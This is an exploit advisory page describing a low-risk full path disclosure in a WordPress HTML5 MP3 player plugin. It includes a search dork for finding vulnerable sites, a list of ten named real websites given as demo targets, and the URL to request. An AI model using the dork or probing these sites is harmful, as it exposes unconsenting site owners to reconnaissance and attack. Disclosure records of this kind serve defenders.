WordPress Html5 Mp3 Player Full Path Disclosure

2014-11-26 / 2015-04-19
Credit: KnocKout
Risk: Low
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com ) .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~App. : WordPress - (html5-mp3-player-with-playlist) Plugin |~Software: https://wordpress.org/plugins/html5-mp3-player-with-playlist/ |~Software: https://github.com/wp-plugins/html5-mp3-player-with-playlist/tree/master/html5plus |~Vulnerability Style : FULL PATH DISCLOSURE |[~]Date : "26.11.2014" |[~]Tested on : Kali Linux, Windows 7 |DORK: inurl:html5plus/html5full.php ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | DEMO : http://childhelpline.org.kh/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://falkopingstrumkar.se/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://groupe-komett.com//wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://www.nethinimnet.com/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://vedanet.com/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://auricle.org.nz/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://www.miguelguldimann.com/shop/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://cp2.leos.co.il/~yossimoadi/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://www.ambedkaritepartyofindia.org/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://www.zionchurchmillersville.com/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php .. .. .. etc ==============[Exploitation]=============================== http://[VICTIM]/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top